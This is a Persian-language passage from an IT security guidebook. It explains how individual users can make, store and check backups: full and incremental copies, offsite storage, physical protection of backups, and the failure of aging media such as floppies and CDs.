ﻣﺤﻠﻲ ﺧﺎﺭﺝ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﻛﻤـﻚ ﺷـﺎﻳﺎﻧﻲ ﺧﻮﺍﻫـﺪ
ﺑﻮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﻛـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴـﺰ ﺑـﻪ
ﻫﻤﺮﺍﻩ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺑﺮﺩﻩ ﺷﺪﻩﺍﻧﺪ.
ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ
ﻭﻗﻮﻉ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻧﻈﻴﺮ ﺳﻴﻞ ،ﺯﻟﺰﻟﻪ ﻭ ﺁﺗﺶﺳﻮﺯﻱ ﺍﻫﻤﻴﺖ ﺣﻔﺎﻇـﺖ
ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻴﺸﺘﺮ ﺭﻭﺷﻦ ﻣـﻲﻛﻨﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻧﮕﻬـﺪﺍﺭﻱ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺤﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺑﻼﻳﺎﻱ ﺩﻳﮕﺮ
ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻧﺸﺖ ﻟﻮﻟﻪﻫﺎﻱ ﮔﺎﺯ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺁﺗﺶﺳﻮﺯﻱ ﻧﺎﺷﻲ ﺍﺯ
ﺁﻥ ﻳﺎ ﺭﻳﺨﺘﻪﺷﺪﻥ ﻣﻮﺍﺩ ﻣﺎﻳﻊ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺗﻬﻮﻳـﻪ ﺑﺎﻋـﺚ ﺑـﺮﻭﺯ
ﻣﺸﻜﻞ ﻣﻲﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﻭﺟﻮﺩ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ
ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ.
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧﻘﺶ ﻣﺆﺛﺮﻱ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ
ﻭﺟﻮﺩ ﺍﹶﺷﻜﺎﻝ ﮔﻮﻧﺎﮔﻮﻥ ﺁﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻋﺠﻴﺐ ﻧﻴﺴﺖ .ﻧﻜﺘـﺔ ﻗﺎﺑـﻞ
ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻜﺎﺭﺭﻓﺘـﻪ ﺩﺭ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺷـﺮﺍﻳﻂ
ﻓﻮﻕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮ ﻛﺎﺭﺑﺮﺩﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺑﻪ
ﺧــﺎﻃﺮ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺣﻔﺎﻇــﺖ ﭼﻨﺪﻻﻳــﻪ ﻭ
ﺑﻜﺎﺭﮔﻴﺮﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻥ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺟﻬـﺖ ﺍﻳﺠـﺎﺩ
ﺍﺯ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﻳﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﺮﺩ؟
ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
.۱
ﺍﺯ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺍﺧﺘﺼﺎﺻﻲ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺳﺖ -ﺍﻟﺒﺘﻪ
ﻏﻴﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ -ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺍﻳـﻦ
ﺍﻣﺮ ﺩﺭ ﻗﺪﻡ ﺍﻭﻝ ﺷﺎﻣﻞ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﺩﻩﺍﻱ ﻣـﻲﺷـﻮﺩ ﻭﻟـﻲ
ﺩﻗــﺖ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺑﺎﻳــﺪ ﺍﺯ ﺗﻤــﺎﻡ ﻓﺎﻳﻠﻬــﺎﻳﻲ ﻛــﻪ
Mirror Disks
20
٥٩
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
.۲
ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ .ﺑـﺎ ﺗﻬﻴـﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ
ﺗﻤﺎﻡ ﺳﻴـﺴﺘﻢ -ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ ﺍﺳـﺘﻔﺎﺩﻩﺍﻱ ﻛـﻪ ﺍﺯ ﺁﻥ
ﻣﻲﺷﻮﺩ -ﻣـﻲﺗـﻮﺍﻥ ﻛـﻞ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ
ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩ .ﻫﻤﭽﻨﻴﻦ ﻗـﺎﺩﺭ ﺧﻮﺍﻫﻴـﺪ ﺑـﻮﺩ ﻓﺎﻳﻠﻬـﺎ ﻭ ﻳـﺎ
ﺷﺎﺧﻪﻫﺎﻱ ﺧﺎﺹ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ.
ﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﺩﻭ ﺭﻭﺵ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ:
.۱
ﺑﻪ ﻣﺤﺾ ﺗﻜﻤﻴﻞ ﻧﺼﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺍﺯ ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎ ﻭ
ﻼ ﻫﺮ ﭼﻨـﺪ ﻣـﺎﻩ
ﻣﺸﺨﺼﺎﺕ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ -ﻣﺜ ﹰ
ﻳﻜﺒﺎﺭ -ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ.
.۲
ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨـﺼﻲ ﺧـﻮﺩ ﻃﺒـﻖ ﻳـﻚ ﺯﻣﺎﻧﺒﻨـﺪﻱ ﺑـﺎ
ﺩﻭﺭﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ .ﺑـﺴﺘﻪ ﺑـﻪ ﻧـﻮﻉ
ﻛﺎﺭﺑﺮﺩ ،ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺭﻭﺷﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻧﻲ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ:
•
ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺧـﻮﺩ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ
ﻧﻤﺎﻳﻴﺪ )ﻫﺮ ﭼﻨﺪ ﻣﺎﻩ ﻳﻜﺒﺎﺭ( ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺣﺠﻢ ﻭﺳﻴﻌﻲ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ.
•
ﭼﻨﺎﻧﭽﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﺷﻤﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻣﺘﻨﺎﻭﺑﹰﺎ
ﺍﺯ ﺁﻥ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ،ﻭﻟﻲ ﺩﺭ ﻓﺎﺻﻠﻪﻫـﺎﻱ
ﻛﻮﺗﺎﻩ ﻓﻘﻂ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻛﻨﻴـﺪ ﻛـﻪ
ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩﺍﻧﺪ .ﺑﻪ ﺍﻳﻦ ﻧـﻮﻉ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ٢٢ﻣﻲ ﮔﻮﻳﻨﺪ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ
ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺑــﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﻓﺎﻳﻠﻬــﺎ ﺩﺭ ﺍﻳـﻦ ﻧــﻮﻉ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻫﻢ ﺑﻪ ﺁﺧـﺮﻳﻦ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ
ﻛﺎﻣﻞ ﻭ ﻫﻢ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳـﺸﻲ
ﻧﻴﺎﺯ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ.
Compatibility
Incremental Backup
21
22
ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻛﺠﺎ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ؟
ﭘﺎﺳﺦ ﺍﻳﻦ ﺳﺆﺍﻝ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻟﻴﻞ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ
ﺍﺳﺖ .ﺍﮔﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﺳﺮﻗﺖ ﻭ ﻳﺎ ﺁﺗﺶﺳﻮﺯﻱ ﺍﺳﺖ ﻣﺤﻞ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻧﺒﺎﻳﺪ ﻧﺰﺩﻳـﻚ
ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺷﺪ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺟﺎﻳﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﻳـﻦ
ﻣﺸﻜﻼﺕ ﺍﺯ ﺣﻔﺎﻇﺖ ﻛﺎﻣﻞ ﺑﺮﺧـﻮﺭﺩﺍﺭ ﺑﺎﺷـﺪ .ﻭﻟـﻲ ﺍﮔـﺮ ﺗﻬﻴـﺔ
ﭘﺸﺘﻴﺒﺎﻥ ﻓﻘﻂ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺎﻙ ﺷﺪﻩ ﻳﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ
ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ،ﺑﺎﻳـﺪ ﻣﺤـﻞ ﺁﻥ ﻃـﻮﺭﻱ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ﻛـﻪ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺁﻥ ﺁﺳﺎﻥ ﺑﺎﺷﺪ.
ﻳﻚ ﺭﺍﻩ ﺣﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣﻞ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤـﻞ
ﺍﻣﻦ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺩﺭ ﻣﺤﻠﻲ ﻧﺰﺩﻳﻚ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺭﺍﻩ
ﺩﻳﮕﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺟﺪﻳﺪﺗﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪﺷـﺪﻩ ﺍﺯ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ
ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ ﺭﺍ ﺩﺭ ﻣﺤﻠﻬـﺎﻱ ﺍﻣـﻦﺗـﺮ
ﺑﮕﺬﺍﺭﻳﺪ .ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﻭ ﻧﺴﺨﻪ ﺗﻬﻴـﻪ ﻣـﻲﻛﻨﻨـﺪ ﻭ
ﻳﻚ ﻧﺴﺨﻪ ﺭﺍ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺩﻭﺭ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻗـﺮﺍﺭ
ﻣﻲﺩﻫﻨﺪ.
ﺍﮔﺮ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﺩﺍﺭﻳﺪ ﻛﻪ ﺳﺎﺭﻗﺎﻥ ﻗﺼﺪ ﺳﺮﻗﺖ ﺁﻧﻬﺎ
ﺭﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﺎ ﺳـﺮﻗﺖ
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻫﻤـﺎﻥ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺑﺪﺳـﺖ
ﺁﻭﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻧﻴﺰ ﻣﺎﻧﻨﺪ
ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻻﺯﻡ ﺭﺍ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ.
ﺁﻳﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ؟
ﺑﻪ ﭼﻨﺪ ﺩﻟﻴﻞ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﻨﮕـﺎﻡ ﻧﻴـﺎﺯ ﻧﺘﻮﺍﻧﻴـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ
ﺗﻬﻴﻪﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ:
•
ﻧﺴﺨﺔ ﻣﺮﺑﻮﻃﻪ ﺑﺴﻴﺎﺭ ﻛﻬﻨﻪ ﻭ ﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺻﺪﻣﻪ
ﺩﻳﺪﻩ ﺑﺎﺷﺪ .ﺑﺮﻭﺯ ﺍﻳـﻦ ﻣـﺸﻜﻞ ﺩﺭ ﺩﻳـﺴﻜﻬﺎﻱ ﻓﻼﭘـﻲ ﻭ
ﺭﺳﺎﻧﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﻴﺶ ﺍﺯ ﻫﻤﻪ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ.
•
ﺩﺳﺘﮕﺎﻫﻲ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻥ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺍﺭﺍﻱ
ﺍﺷﻜﺎﻝ ﺑـﻮﺩﻩ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺩﺍﺩﺓ ﻧﻮﺷـﺘﻪﺷـﺪﻩ ﺩﺭ
ﭘﺸﺘﻴﺒﺎﻥ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ
ﺑﺨﺶ ﺩﻭﻡ
ﺳﺎﺯﮔﺎﺭﻱ ٢١ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺑـﺮ
ﻋﻬــﺪﻩ ﺩﺍﺭﻧــﺪ )ﻣﺜــﻞ ﺍﻧــﻮﺍﻉ ﻓﺎﻳﻠﻬــﺎﻱ ﺗﻨﻈﻴﻤــﺎﺕ ﻭ ﭘﻴﻜﺮﺑﻨــﺪﻱ(
ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﮔﺮﺩﺩ .ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﻧﮕﻬﺪﺍﺭﻱ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺻﺤﺖ ﺁﻧﻬﺎ ﺑـﺮﺍﻱ ﺑﺎﺯﻳـﺎﺑﻲ ﺑـﺪﻭﻥ
ﺍﺷﻜﺎﻝ ﺩﺭ ﺁﻳﻨﺪﻩ ﻛﺎﺭ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ
ﺗﻤـﺎﻡ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﭼﻨـﺪ ﺷـﺎﺧﻪ ﺍﺻــﻠﻲ
ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ ﻛـﻪ
ﺗﻨﻬﺎ ﺍﻃﻼﻋﺎﺕ ﻳﻜﺘﺎ ﻭ ﺍﺧﺘﺼﺎﺻﻲ ﺷﻤﺎ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ.
ﻻ
ﮔﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻣﻌﻤـﻮ ﹰ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮ ﺩﺭ ﻣـﻮﺭﺩ ﭼﮕـﻮﻧﮕﻲ ﺗﻬﻴـﻪ ﭘـﺸﺘﻴﺒﺎﻥ
ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺑﻪ ﻛﺎﺭﺑﺮ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ.
٦٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺘﻮﺍﻥ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ ،ﭘﺸﺘﻴﺒﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ
ﺧﻮﺍﻧﺪ.
•
ﺭﺳﺎﻧﻪﺍﻱ ﻛﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﻭﻱ ﺁﻥ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﺩﭼـﺎﺭ
ﻧﻘﺺ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻧﻘﺺ ﺭﺳﺎﻧﻪ ﺩﺭ ﺩﻳﺴﻜﻬﺎﻱ ﻓﻼﭘﻲ
ﺍﺷﻜﺎﻝ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺠﻲ ﺑﻮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﮔﺮ ﻳﻚ ﺩﻳﺴﻚ ﺗﻨﻬﺎ
ﭼﻨﺪ ﺭﻭﺯ ﺑﻌﺪ ﺍﺯ ﺗﻬﻴﻪ ﺷﺪﻥ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻣـﻲﺷـﺪ
ﭼﻨﺪﺍﻥ ﺗﻌﺠﺐ ﻛﺴﻲ ﺭﺍ ﺑـﺮ ﻧﻤـﻲﺍﻧﮕﻴﺨـﺖ .ﺩﻳـﺴﻜﻬﺎﻱ
ﻓﺸﺮﺩﻩ ﺑﻌﻨـﻮﺍﻥ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﻣﺎﻧـﺪﮔﺎﺭﺗﺮ ﺷـﻬﺮﺕ
ﺩﺍﺷﺘﻨﺪ ،ﺍﻣﺎ ﻳـﻚ ﻣﻄﺎﻟﻌـﻪ ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﻧـﺸﺎﻥ ﺩﺍﺩ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩﺍﻱ ﻛﻪ ﻛﻴﻔﻴﺖ ﭼﻨﺪﺍﻥ ﻣﻄﻠﻮﺑﻲ ﻧﺪﺍﺭﻧـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌـﺪ ﺍﺯ ﮔﺬﺷـﺖ ﺣـﺪﻭﺩ ﺩﻭ ﺳـﺎﻝ ﺍﺯ ﺯﻣـﺎﻥ
ﻧﻮﺷﺘﻪﺷﺪﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺁﻧﻬﺎ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺷﻮﻧﺪ.
ﺧﻮﺍﻧﺪﻥ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻫﻲ ﻏﻴﺮ ﺍﺯ ﺁﻥ ﻛﻪ ﻧﺴﺨﺔ
ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎ ﺁﻥ ﺗﻬﻴﻪ ﺷﺪﻩ ﻛﻨﺘﺮﻝ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ
ﺍﺯ ﺻﺤﺖ ﺭﺳﺎﻧﺔ ﺣﺎﻭﻱ ﻧـﺴﺨﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺳـﺖ .ﺩﻗـﺖ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎ
ﻗﺎﺑﻠﻴﺖ ﭘﺎﻙ ﻛـﺮﺩﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲ ﻛﻨﻴـﺪ )ﻣﺜـﻞ ﺩﻳـﺴﻜﻬﺎﻱ Zipﻭ
ﻓﻼﭘﻲ( ،ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮ ﻭ ﺗﻤﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺕ ﺑـﺴﻴﺎﺭ ﻃـﻮﻻﻧﻲ ﻧﮕـﻪ
ﻣﻲﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺳﺆﺍﻝ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﭼـﻪ ﺯﻣـﺎﻧﻲ ﺍﺯ
ﻧﺴﺨﻪﻫﺎﻳﻲ ﻛﻪ ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﺍﺳﻨﺎﺩ ﻭ ﺗـﺼﺎﻭﻳﺮ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ
ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؟ ﺍﮔﺮ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﺑﺮﺍﻱ ﺯﻣﺎﻥ ﻃـﻮﻻﻧﻲ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﺯ ﺭﺩﻩ ﺧـﺎﺭﺝ ﺷـﺪﻥ
ﺭﺳﺎﻧﻪ ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﺩﺍﺩﻩﺍﻱ ﺩﺭ ﻳﻚ
ﻓﻼﭘﻲ ﭘﻨﺞ ﺍﻳﻨﭽﻲ ﻛﻪ ﺩﺭ ﺳﺎﻝ ۱۹۸۰ﺭﺍﻳﺞ ﺑـﻮﺩﻩ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ
